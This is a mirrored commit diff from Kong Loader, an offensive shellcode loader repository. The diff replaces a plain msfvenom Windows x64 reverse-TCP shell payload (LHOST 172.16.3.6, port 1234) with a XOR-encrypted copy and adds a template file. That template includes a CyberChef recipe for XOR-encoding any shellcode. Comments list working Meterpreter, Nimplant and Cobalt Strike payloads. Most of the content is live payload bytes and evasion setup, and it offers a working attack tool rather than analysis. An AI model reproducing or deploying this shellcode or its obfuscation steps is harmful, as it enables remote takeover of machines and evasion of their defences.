mirror of
https://github.com/tijme/kong-loader
synced 2026-06-06 16:54:30 +00:00
Added template shellcode.
This commit is contained in:
Binary file not shown.
+7
-5
@@ -76,6 +76,8 @@
|
||||
*
|
||||
* Our custom shellcode is loaded from `Shellcode.c` for easy adjustability.
|
||||
*/
|
||||
#include "shellcode/Your-Shellcode.c"
|
||||
|
||||
// #include "shellcode/Custom-Storage-1.c" // Working
|
||||
// #include "shellcode/Custom-Syscall-1.c" // Working
|
||||
// #include "shellcode/Custom-ArgumentOnStack-1.c" // Working
|
||||
@@ -83,15 +85,15 @@
|
||||
// #include "shellcode/Custom-ArgumentAsString-1.c" // Working
|
||||
// #include "shellcode/Custom-KitchenSink-1.c" // Working
|
||||
// #include "shellcode/Custom-Multiply-1.c" // Working
|
||||
#include "shellcode/Msfvenom-WinExec-1.c" // Working
|
||||
// #include "shellcode/Msfvenom-WinExec-1.c" // Working
|
||||
// #include "shellcode/Msfvenom-ShellReverseTCP-1.c" // Working? (from C:\ drive)
|
||||
// #include "shellcode/Msfvenom-MeterpreterReverseTCP-2.c" // Working
|
||||
// #include "shellcode/Nimplant-Raw-1.c" // Working
|
||||
|
||||
// #include "shellcode/Mythic-Hannibal-1.c" // Not working
|
||||
// #include "shellcode/Msfvenom-MeterpreterReverseTCP-1.c" // Not working
|
||||
// #include "shellcode/Proprietary-CobaltStrike-StagelessHTTP-1.c" // Not working
|
||||
// #include "shellcode/Donut-MessageBoxA-1.c" // Not working
|
||||
// #include "shellcode/Mythic-Hannibal-1.c" // Not working yet
|
||||
// #include "shellcode/Msfvenom-MeterpreterReverseTCP-1.c" // Not working yet
|
||||
// #include "shellcode/Proprietary-CobaltStrike-StagelessHTTP-1.c" // Not working yet
|
||||
// #include "shellcode/Donut-MessageBoxA-1.c" // Not working yet
|
||||
|
||||
/**
|
||||
* Custom helper functions that do not use global variables
|
||||
|
||||
@@ -14,13 +14,13 @@
|
||||
* Predefined definitions
|
||||
*/
|
||||
#define STATIC_SHELLCODE_NAME "Msfvenom-ShellReverseTCP-1" // Name to be printed
|
||||
#define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
|
||||
#define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x1 // May only be negative for debugging purposes with plain static shellcode
|
||||
#define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x0 // Print return value of the shellcode to the console
|
||||
|
||||
/**
|
||||
* The XOR password to use.
|
||||
*/
|
||||
static uint8_t StaticPassword[] = { 0xAA };
|
||||
static uint8_t StaticPassword[] = { 0xAA, 0x41, 0xCC };
|
||||
|
||||
/**
|
||||
* The shellcode to use.
|
||||
@@ -29,50 +29,37 @@ static uint8_t StaticPassword[] = { 0xAA };
|
||||
* msfvenom --platform windows -i 0 -e generic/none --arch x64 -f c -p windows/x64/shell_reverse_tcp LHOST=172.16.3.6 LPORT=1234 EXITFUNC=none
|
||||
*/
|
||||
static uint8_t StaticShellcode[] = {
|
||||
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
|
||||
0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2,
|
||||
0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
|
||||
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7,
|
||||
0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c,
|
||||
0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
|
||||
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52,
|
||||
0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
|
||||
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
|
||||
0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49,
|
||||
0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34,
|
||||
0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
|
||||
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0,
|
||||
0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1,
|
||||
0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
|
||||
0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
|
||||
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41,
|
||||
0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
|
||||
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0,
|
||||
0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff,
|
||||
0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33,
|
||||
0x32, 0x00, 0x00, 0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81,
|
||||
0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5, 0x49, 0xbc,
|
||||
0x02, 0x00, 0x04, 0xd2, 0xac, 0x10, 0x03, 0x06, 0x41, 0x54,
|
||||
0x49, 0x89, 0xe4, 0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77,
|
||||
0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68, 0x01, 0x01,
|
||||
0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff,
|
||||
0xd5, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48,
|
||||
0xff, 0xc0, 0x48, 0x89, 0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89,
|
||||
0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x48,
|
||||
0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48,
|
||||
0x89, 0xf9, 0x41, 0xba, 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5,
|
||||
0x48, 0x81, 0xc4, 0x40, 0x02, 0x00, 0x00, 0x49, 0xb8, 0x63,
|
||||
0x6d, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x50, 0x41,
|
||||
0x50, 0x48, 0x89, 0xe2, 0x57, 0x57, 0x57, 0x4d, 0x31, 0xc0,
|
||||
0x6a, 0x0d, 0x59, 0x41, 0x50, 0xe2, 0xfc, 0x66, 0xc7, 0x44,
|
||||
0x24, 0x54, 0x01, 0x01, 0x48, 0x8d, 0x44, 0x24, 0x18, 0xc6,
|
||||
0x00, 0x68, 0x48, 0x89, 0xe6, 0x56, 0x50, 0x41, 0x50, 0x41,
|
||||
0x50, 0x41, 0x50, 0x49, 0xff, 0xc0, 0x41, 0x50, 0x49, 0xff,
|
||||
0xc8, 0x4d, 0x89, 0xc1, 0x4c, 0x89, 0xc1, 0x41, 0xba, 0x79,
|
||||
0xcc, 0x3f, 0x86, 0xff, 0xd5, 0x48, 0x31, 0xd2, 0x48, 0xff,
|
||||
0xca, 0x8b, 0x0e, 0x41, 0xba, 0x08, 0x87, 0x1d, 0x60, 0xff,
|
||||
0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95,
|
||||
0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06,
|
||||
0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13,
|
||||
0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5
|
||||
0x56,0x09,0x4f,0x4e,0xb1,0x24,0x6a,0x41,0xcc,0xaa,0x00,0x9d,0xeb,0x11,
|
||||
0x9e,0xfb,0x17,0x84,0x9b,0x93,0xa9,0xe2,0xca,0x9e,0xca,0x09,0x47,0xf8,
|
||||
0x59,0x84,0x21,0x13,0xec,0xe2,0xca,0xbe,0xfa,0x09,0xc3,0x1d,0x0b,0x86,
|
||||
0xe7,0x70,0x05,0xe2,0x70,0x0c,0x06,0x7d,0xad,0xd6,0x43,0xe0,0x8a,0x00,
|
||||
0x0d,0x63,0x4c,0x8d,0xab,0x80,0x2e,0x47,0x13,0x8d,0xfb,0x09,0x47,0xf8,
|
||||
0x61,0x47,0xe8,0x7d,0x84,0xab,0x91,0x47,0x2a,0xc9,0xcc,0xaa,0x41,0x84,
|
||||
0x2f,0x81,0xb8,0xcd,0x09,0xcd,0x7a,0x11,0x47,0xe2,0x59,0x88,0x21,0x01,
|
||||
0xec,0xe3,0x40,0x1c,0x49,0x17,0x84,0x55,0x88,0x8d,0x21,0x75,0x44,0xe2,
|
||||
0x40,0x1a,0xe7,0x70,0x05,0xe2,0x70,0x0c,0x06,0x00,0x0d,0x63,0x4c,0x8d,
|
||||
0xab,0x80,0xf4,0x4a,0x34,0x3d,0xe6,0x42,0x80,0x8e,0x49,0x89,0x93,0x90,
|
||||
0xb9,0x72,0x19,0x88,0x21,0x01,0xe8,0xe3,0x40,0x1c,0xcc,0x00,0x47,0xa6,
|
||||
0x09,0x88,0x21,0x01,0xd0,0xe3,0x40,0x1c,0xeb,0xca,0xc8,0x22,0x09,0xcd,
|
||||
0x7a,0x00,0x94,0xeb,0x19,0x92,0xf3,0x1b,0x8d,0xf2,0x00,0x95,0xeb,0x1b,
|
||||
0x84,0x29,0xad,0xec,0xeb,0x13,0x33,0x4a,0x19,0x8d,0xf3,0x1b,0x84,0x21,
|
||||
0x53,0x25,0xfd,0xbe,0x33,0x55,0x1c,0x85,0x14,0x36,0xbf,0x98,0x1e,0xff,
|
||||
0x98,0x41,0xcc,0xeb,0x17,0x85,0x23,0xa7,0x84,0x2b,0xad,0x6c,0xab,0x41,
|
||||
0xcc,0xe3,0xc8,0x29,0xe3,0xfd,0xce,0xaa,0x45,0x1e,0x06,0x51,0xcf,0xa9,
|
||||
0x00,0x98,0xe3,0xc8,0x28,0xe6,0xc8,0x3d,0xeb,0xfb,0x80,0xdd,0x67,0xcb,
|
||||
0x55,0x94,0x80,0x23,0xab,0xa4,0xab,0x40,0xcc,0xaa,0x18,0x8d,0x10,0x68,
|
||||
0x4c,0xc1,0x41,0x33,0x7f,0x11,0x9c,0xe7,0x70,0x05,0xe7,0x70,0x0c,0xe2,
|
||||
0xbe,0x0c,0xe2,0xc8,0x0e,0xe2,0xbe,0x0c,0xe2,0xc8,0x0d,0xeb,0xfb,0x26,
|
||||
0xa5,0x9e,0x2c,0x55,0x94,0x84,0x23,0x86,0xa6,0xba,0x00,0x94,0xe6,0xc8,
|
||||
0x2e,0xe2,0xc8,0x35,0xeb,0xfb,0x55,0x0f,0x35,0xad,0x55,0x94,0x84,0x2b,
|
||||
0x85,0x8c,0xa8,0x41,0xcc,0xe3,0xf9,0xaf,0xc7,0x25,0xcc,0xaa,0x41,0xcc,
|
||||
0xaa,0x00,0x9c,0xeb,0x11,0x84,0x23,0xa3,0x9b,0xfd,0x16,0x81,0x9b,0x81,
|
||||
0xa6,0xa7,0x18,0x8d,0xfa,0xa3,0x30,0xcc,0x86,0x88,0x8e,0x15,0xcd,0xab,
|
||||
0x09,0x41,0xee,0x65,0xd4,0x6c,0x41,0xa4,0xe2,0xc8,0x2a,0xfc,0x11,0x8d,
|
||||
0xfa,0x00,0x9c,0xeb,0x11,0x85,0x55,0x81,0x8d,0xfa,0x08,0x33,0x62,0x0c,
|
||||
0x45,0x6b,0x0d,0x45,0x6b,0x00,0x76,0xd3,0x8d,0xf3,0x2c,0xbe,0x19,0xe2,
|
||||
0x70,0x1e,0xe2,0xbe,0x06,0x21,0x4f,0x8d,0x10,0x49,0x4b,0xb7,0x21,0x33,
|
||||
0x7f,0xfa,0x66,0x6f,0xa3,0x91,0xeb,0xfb,0x6a,0x3f,0xfc,0x51,0x55,0x94,
|
||||
0x84,0x29,0x85,0xe4,0x96,0x47,0xb0,0xa0,0xc1,0x37,0x4a,0x34,0xc9,0x11,
|
||||
0x06,0xdf,0xd8,0x2e,0xa6,0xaa,0x18,0x8d,0x23,0x9b,0x33,0x7f
|
||||
};
|
||||
@@ -0,0 +1,45 @@
|
||||
/**
|
||||
* Mozilla Public License (MPL) Version 2.0.
|
||||
*
|
||||
* Copyright (c) 2024 Tijme Gommers (@tijme).
|
||||
*
|
||||
* This source code file is part of Kong Loader. Kong Loader is
|
||||
* licensed under Mozilla Public License (MPL) Version 2.0, and
|
||||
* you are free to use, modify, and distribute this file under
|
||||
* its terms. However, any modified versions of this file must
|
||||
* include this same license and copyright notice.
|
||||
*/
|
||||
|
||||
/**
|
||||
*
|
||||
* ██████╗██╗ ██╗██████╗ ███████╗██████╗ ██████╗██╗ ██╗███████╗███████╗
|
||||
* ██╔════╝╚██╗ ██╔╝██╔══██╗██╔════╝██╔══██╗██╔════╝██║ ██║██╔════╝██╔════╝
|
||||
* ██║ ╚████╔╝ ██████╔╝█████╗ ██████╔╝██║ ███████║█████╗ █████╗
|
||||
* ██║ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██╗██║ ██╔══██║██╔══╝ ██╔══╝
|
||||
* ╚██████╗ ██║ ██████╔╝███████╗██║ ██║╚██████╗██║ ██║███████╗██║
|
||||
* ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝
|
||||
*
|
||||
* Use this CyberChef command to XOR your shellcode and convert it to the format for this file (adjust XOR key if desired):
|
||||
* https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','0x%5C%5Cw%7B2%7D',true,true,false,false,false,false,'List%20matches')Find_/_Replace(%7B'option':'Regex','string':'(.*)%5C%5Cn'%7D,'$1,',true,false,true,false)Remove_whitespace(true,true,true,true,true,false)From_Hex('Auto')XOR(%7B'option':'Hex','string':'AA41CC'%7D,'Standard',false)To_Hex('0x%20with%20comma',15)Find_/_Replace(%7B'option':'Regex','string':'((0x(%5C%5Cd%7C%5C%5Cw)%7B2%7D,?%5C%5Cn?)%2B)'%7D,'%23define%20STATIC_SHELLCODE_NAME%20%22Your-Shellcode%22%20//%20Name%20to%20be%20printed%20%5C%5Cn%23define%20STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED%200x1%20//%20May%20only%20be%20negative%20for%20debugging%20purposes%20with%20plain%20static%20shellcode%20%5C%5Cn%23define%20STATIC_SHELLCODE_HAS_RETURN_VALUE%200x0%20//%20Print%20return%20value%20of%20the%20shellcode%20to%20the%20console%5C%5Cn%5C%5Cnstatic%20uint8_t%20StaticPassword%5B%5D%20%3D%20%7B%200xAA,%200x41,%200xCC%20%7D;%5C%5Cn%5C%5Cnstatic%20uint8_t%20StaticShellcode%5B%5D%20%3D%20%7B%5C%5Cn$1%5C%5Cn%7D;',true,false,true,true)Find_/_Replace(%7B'option':'Regex','string':'%5E0x'%7D,'%20%20%20%200x',true,false,true,false)&input=Ly8gVXNlIHRoZSBjb21tYW5kIGJlbG93IHRvIGdldCB0aGUgaW5wdXQgZm9yIHRoaXMgWE9SIGVuY29kaW5nIGJha2Ugd2l0aCBDeWJlckNoZWYKLy8geHhkIC1pIHlvdXItc2hlbGxjb2RlLmJpbgoKdW5zaWduZWQgY2hhciBfX195b3VyX3NoZWxsY29kZV9iaW5bXSA9IHsKICAweDU1LCAweDQ4LCAweDg5LCAweGU1LCAweGU4LCAweDhiLCAweDk3LCAweDAwLCAweDAwLCAweDkwLCAweDVkLCAweGMzLAogIDB4NTUsIDB4NDgsIDB4ODksIDB4ZTUsIDB4NDgsIDB4ODMsIDB4ZWMsIDB4MTAsIDB4YzcsIDB4NDUsIDB4ZmMsIDB4NjAsCiAgMHgwMCwgMHgwMCwgMHgwMCwgMHg4YiwgMHg0NSwgMHhmYywgMHg2NSwgMHg0OCwgMHg4YiwgMHgwMCwgMHg0OCwgMHg4OSwKICAweDQ1LCAweGYwLCAweDQ4LCAweDhiLCAweDQ1LCAweGYwLCAweGM5LCAweGMzLCAweDU1LCAweDQ4LCAweDg5LCAweGU1LAogIDB4NDgsIDB4ODksIDB4NGQsIDB4MTAsIDB4NDgsIDB4OGIsIDB4NDUsIDB4MTAsIDB4NDgsIDB4ODMsIDB4ZTgsIDB4MTAsCiAgMHg1ZCwgMHhjMywgMHg1NSwgMHg0OCwgMHg4OSwgMHhlNSwgMHg0OCwgMHg4OSwgMHg0ZCwgMHgxMCwgMHg0OCwgMHg4OQogIC4uLgp9Ow
|
||||
*/
|
||||
|
||||
/**
|
||||
* Predefined definitions
|
||||
*/
|
||||
#define STATIC_SHELLCODE_NAME "Your-Shellcode" // Name to be printed
|
||||
#define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x1 // May only be negative for debugging purposes with plain static shellcode
|
||||
#define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x0 // Print return value of the shellcode to the console
|
||||
|
||||
/**
|
||||
* The XOR password to use.
|
||||
*/
|
||||
static uint8_t StaticPassword[] = { 0xAA, 0x41, 0xCC };
|
||||
|
||||
/**
|
||||
* The shellcode to use.
|
||||
*/
|
||||
static uint8_t StaticShellcode[] = {
|
||||
// Replace with your shellcode
|
||||
0xe2,0xcc,0xc9,0xa7,0x41,0xcc,0xaa,0x4e,0x47,0xaa,0x09,0x41,0xb7,0x49,0xcc,
|
||||
0xaa,0x41,0xc5,0xa5,0xee,0xcf,0x69,0x43,0xcc,0xaa,0x41,0xcf,0xaa,0x41,0xcc
|
||||
};
|
||||
Reference in New Issue
Block a user